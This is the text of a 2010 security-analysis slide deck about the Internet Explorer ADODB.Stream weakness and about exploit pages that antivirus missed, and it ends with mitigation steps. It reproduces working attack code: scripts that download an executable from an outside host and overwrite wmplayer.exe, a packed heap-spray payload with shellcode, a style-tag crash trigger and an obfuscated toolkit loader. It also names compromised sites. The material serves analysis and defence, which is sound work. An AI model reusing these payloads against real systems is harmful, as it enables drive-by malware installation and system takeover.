Upload
debra
View
57
Download
1
Tags:
Embed Size (px)
DESCRIPTION
Shasta Console Operations. February 2010 Tony Caleb. Agenda. MSIE ADODB. Stream Object Installation Weakness. AV/IS FN Detection. Dynamic Analysis. Introduction. - PowerPoint PPT Presentation
Citation preview
Shasta Console Operations
February 2010Tony Caleb
Agenda
Dynamic Analysis
AV/IS FN Detection
MSIE ADODB. Stream Object Installation Weakness
Introduction
MSIE ADODB.Stream Object Installation Weakness is the BROWSER EXPLOIT, that allows the hackers to attack a system through browser, install it’s activex controls and takes over the victims system.
This attack could pose a serious security threat. You should take immediate action to stop any damage or prevent further damage from happening. - SYMANTEC
ADODB.stream provides a method for reading and writing files on a hard drive. This by-design functionality is sometimes used by web applications. However, when combined with known security vulnerabilities in Microsoft Internet Explorer, it could allow an internet web site to execute script from the Local Machine Zone (LMZ). This occurs because the ADODB.Stream object allows access to the hard drive when hosted within Internet Explorer. - MICROSOFT
This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim file system. – SECURITY FOCUS
How does it occurs?
Microsoft Internet Explorer is prone to a security weakness that may permit malicious HTML documents to create or overwrite files on a victim file system when interpreted from the Local Zone (or other Security Zones with relaxed security restrictions, such as the Intranet Zone).
What it does in infected machine?
This weakness depends on scripting that abuses the ADODB.Stream Object to write an attacker-specified file to the victim file system. In this manner, an HTML document that is interpreted in the context of a Security Zone with relaxed security restrictions may install a malicious file on the victim file system.
The stream object contains several methods for reading and writing binary files and text files. When this by-design functionality is combined with known security vulnerabilities in Microsoft Internet Explorer, an Internet Web site could execute script from the Local Machine zone. This behavior occurs because the ADODB.Stream object permits access to the hard disk when the ADODB.Stream object is hosted in Internet Explorer
The error that displays on the page when the script is been executed ( It makes the user think that just a error has occurred so that the page is not loaded but the malicious content is been downloaded in his system without his knowledge)
error.jsp is a jsp page that consists of one line, namely<% response.setStatus(HttpServletResponse.SC_UNAUTHORIZED); %>(Just to send a false header in IE)
Sample Code
const adTypeBinary = 1const adSaveCreateOverwrite = 2const adModeReadWrite = 3
set xmlHTTP = CreateObject("Microsoft.XMLHTTP")xmlHTTP.open "GET","http://ip3e83566f.speed.planet.nl/NOTEPAD.EXE",falsexmlHTTP.sendcontents = xmlHTTP.responseBody
Set oStr = CreateObject("ADODB.Stream")oStr.Mode = adModeReadWriteoStr.Type = adTypeBinaryoStr.Open
oStr.Write(contents)oStr.SaveToFile "c:\\test.exe", adSaveCreateOverwrite
</script>
How a file is been downloaded into a victims system
Sample Code
var x = new ActiveXObject("Microsoft.XMLHTTP");x.Open("GET", "http://attacker/trojan.exe",0);x.Send();
var s = new ActiveXObject("ADODB.Stream");s.Mode = 3;s.Type = 1;s.Open();s.Write(x.responseBody);
s.SaveToFile("C:\\Program Files\\Windows Media Player\\wmplayer.exe",2);location.href = "mms://";
How this exploit can be made in vmplayer
Modification of vmplayer.exe
<script language="javascript“>function preparecode(code) {result = '';lines = code.split(/\r\n/);for (i=0;i<lines.length;i++) {line = lines[i];if (line != '') {result += line +'\\r\\n';}}return result;}function doit() {mycode = preparecode(document.all.code.value);myURL = "file:javascript:eval('" + mycode + "')";window.open(myURL,"_media")}window.open("error.jsp","_media");setTimeout("doit()", 5000);</script>
Code for the modification of Windows Media Player
How to Overcome This Issue
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{00000566-0000-0010-8000-00AA006D2EA4}
Changing the keys in the Registry
Disabling of ActiveX controls
Disabling of any kind of ActiveX controls in the IE security. So that it does not allow anything to download by itself( Anyhow in the older versions of the Internet Explorer it is not possible).
Changing the keys in the Registry
1. Close any open Internet Explorer browser windows.2. Click Start, and then click Run.3. In the Open box, type Regedit, and then click OK.4. In Registry Editor, locate the following registry key:5. “HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility”6. Right-click ActiveX Compatibility, point to New, and then click Key.7. Type the following name for the key:8. {00000566-0000-0010-8000-00AA006D2EA4}9. Close Registry Editor.
Samples of FN Detection
MSIE Event Object Mem Corruption Code Exec
HTTP MSIE Style Tag Cmt Mem Corruption
The domain “khan.co.kr” with URL http://gallery.khan.co.kr/ is found to have the above threat but during the manual analysis of this URL NIS does not detect it. Here the hackers have bypassed the AV/IS.
This is a common FN that we find in with IS.Here a script that redirects to malicious links will be given in the encoded format and since the redirect link is not active NIS but it will change dynamically.This clearly proves that the malicious content is intentionally done since the script tag is present after the close html tag.
Trojan.Malscript.B
The domain Voy.com with the URL http://www.voy.com//76583 is found to have the above threat but during the manual analysis of this URL and the AV/IS fail to detect.
MSIE Event Object Mem Corruption Code Exec
MSIE Event Object Mem Corruption Code Exec
MSIE Event Object Mem Corruption Code Exec
Code in the index2.html
eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('g a=1b;g 2="%u";g1B="%2E%w%2t%c%2w"+2+"b";g 10="%P%34%h%39"+2+"6";g 1l="%C%B%A%h%36";g 1C="%2Y%2Q%2P%2T%1P%1W";g s=a("%1O%1L"+2+"6%M%1H%1F%K%1E%1K"+2+"6%1a%1N%2m%2a%S%4b"+2+"b%4a");s+=a("%q%N%y%49"+2+"6%41%f%k%4w"+2+"6%4r%q%N%y%4s"+2+"6%3s%f%k");s+=a("%3w"+2+"6%3V%q%N%y%1y"+2+"6%3E%f%k%3I"+2+"6%3H%1s%17%3G%M%16");s+=a("%19%1e%r%k%4c"+2+"6%R%1s%17%3J%M%16%19%3A%r%k%3B"+2+"6%R");s+=a("%3C%3D"+2+"6%1a%3L%3S%3T%3U%3R%3Q%3M%3N%3O%3P%3z%3y%3i%3j%3k"+"F"+"0"+"5");s+=a("%3l%3h%3g%3c%3d%3e"+2+"6%3f%X%3m%1c%J%L%3n%15%3u");s+=a("%L%3v%1c%J%L%3t%15%3o%3p%W%P%3q%f%3r%14%1e%q");s+=a("%k%3X"+2+"6%Q%4t%4u%4v%4q%4m%4n%4o%4p%X%4x%4E%4F%4G");s+=a("%4D%4C%W%12%1z%4y%4z%4A%4B%4l%4k%44%1z%46%47%43%42");s+=a("%3Y%3Z"+2+"6%40%14%P"+10+"%4g"+2+"6%4h%4i"+2+"6%4j");s+=a("%4f"+2+"b%m%4e"+2+"6%12%11%11%l%3b%4d%4H%2U%27%28%29%u"+"4"+"1"+"9"+"0");s+=a("%26%25%21%22%23%24%2b"+2+"b%c%2c"+2+"b%2j%2k%2l%1y%2i"+2+"b");s+=a("%18%1f%1r%2h"+2+"6%h%2d"+2+"6%l%1q%1t%1u%1x%2e"+2+"6%1w%
MSIE Event Object Mem Corruption Code Exec
Code in the index2.html
1v");s+=a("%S%2f"+2+"6%20"+2+"6%K%S%1V"+2+"b%1G%1J%1f%1r%1M"+2+"6%h%1I");s+=a(""+2+"6%l%1q%1t%1u%1x%1Z"+2+"6%1w%1v%1X%1Y%1U%1T%R%1Q"+2+"b");s+=a("%1R%1S%2g%Q%3a%2o%2V%2W%2X"+2+"6%l%Q%2S%2O%U%2R%2Z");s+=a("%37%38"+2+"6%35%30%31%32%33%2N%2M%r%K%2x%y%2y"+2+"6%l");s+=a("%2z%2v%1d%w%J%2u%2q%2p%2r%2s"+2+"6%l%z%2A%2B%f"+2+"6");s+=a("%2I%2J"+2+"6%2K%2L%2H%1n%w%1k%2G%v%1j%2C%r%1g%2D"+2+"b");s+=a("%1h"+2+"b%1i%d%2F%45%5k%76"+1l+""+2+"b%h%75"+2+"6");s+=a("%4I%v%m%E"+2+"b%z%I%78%79%U%74%73%C%B%A%h%6Z");s+=a(""+2+"b%h%6Y"+2+"6%70%v%m%E"+2+"b%z%I%71%72%U%7b%7j%C");s+=a("%B%A%h%7m"+2+"b%h%7i"+2+"6%7h%v%m%E"+2+"b%z%I%7g%6X");s+=a("%6W%1n%w%1k%6E%6D%1j%6F%f%1g%6G"+2+"b%1h"+2+"b%1i%6H%c");s+=a("%6C"+2+"6%6B%6x%6w%6y%f%e%d%c%6z"+2+"6%6A%6I%6J%6S%f");s+=a("%e%d%c%6R"+2+"6%6T%6U%6V%6Q%f%e%d%c%6P"+2+"6%6L%6K");s+=a("%6M%7o%f%e%d%c%6N"+2+"6%6O%7n%7x%86%f%e%d%c%7R");s+=a(""+2+"b%7Q%87%7W%7X%f%e%d%c%7Y"+2+"6%7Z%7V%7U%7P%f%e");s+=a("%d%c%7S"+2+"6%7T%80%81%88%f%e%d%c%82"+2+"b%83%84%85");s+=a("%7N%f%e%d%c%7w"+2+"b%7O%7y%Z%7z%f%e%d%c%7v"+2+"6");s+=a("%7u%7q%7p%7r"+2+"6%e%d%c%7s"+2+"6%7t%7A%7B%7J"+2+"6%e%
HTTP MSIE Style Tag Cmt Mem Corruption
The /* is closed after the end of style tag that is after 80,000 lines of garbage stuff.Due to insertion of these unwanted stuff, the memory stack is overflow and as a result the entire browser crashes.
<!-- google_ad_section_start --><style type=text/css>body{background-repeat:repeat;background-color:black;background-image:none;color:black;visibility:hidden;font-size:10000;line-height:10000;letter-spacing:10000;text-decoration:blink;text-align:right;margin-top:10000;}form{visibility:hidden;}table{visibility:hidden;}a{visibility:hidden;}img{visibility:hidden;}input{visibility:hidden;}</style><A rel=nofollow target=_blank HREF=https:???????????????????????????????????????????? > <style>@; /*<<BR>
URL : hxxp://www.voy.com//76583/
Manual Analysis
How we do the manual analysis
Tools we use for manual analysis
Samples
Tools Used for Manual Analysis
HTTP Analyzer
TCP Viewer
Process Explorer
Systracer (System Tracer)
Start up programs ( msconfig,services.msc)
HTTP Malicious Toolkit Variant Activity
From URL:
<script language=JavaScript> function bfbn15(p){ var h=p.length,k=1024,s,i,c,z=0,d=0,j=0,t=Array(63,31,62,3,50,13,56,52,26,53,0,0,0,0,0,0,30,58,61,15,25,14,41,59,1,51,47,10,54,29,24,57,43,49,42,34,19,55,38,28,32,20,40,0,0,0,0,46,0,17,48,18,44,36,22,5,7,35,11,37,2,27,0,8,39,23,6,33,45,16,21,9,60,4,12);for(i=Math.ceil(h/k);i>0;i--){c='';for(s=Math.min(h,k);s>0;s--,h--){{j|=(t[p.charCodeAt(z++)-48])<<d;if(d){c+=String.fromCharCode(129^j&255);j>>=8;d-=2}else{d=6}}}eval(c);}}bfbn15('Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjApCC6dT@ZJ3EGeIm_pC2OXj@Z4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG70@OF4z69p2PI32GkGEGFSARUfm_QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPdUrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl') </script>
After Decoding
< script language = JavaScript > function bfbn15(p)bfbn15('Li2GkG_BJK1BXqCB4IPFgG2GemR_kG_67IEOJq0PLCCA9T@RVLjApCC6dT@ZJ3EGeIm_pC2OXj@Z4CJ6xE8A9q1xGARPV3@Be1PAJS2GpG_P9GRJVRKIXq1AJEJG70@OF4z69p2PI32GkGEGFSARUfm_QSRRVVGOi1E6SmRRVE8ZLi@O9pEJbVmdsVEOZm@A9IPdUrRx9i1GeIGZki_xQUE66JGG_0EOi2mJ_S2OI3EGe0PFZl') </script>
HTTP Malicious Toolkit Variant Activity
HTTP Malicious Toolkit Variant Activity
Thank You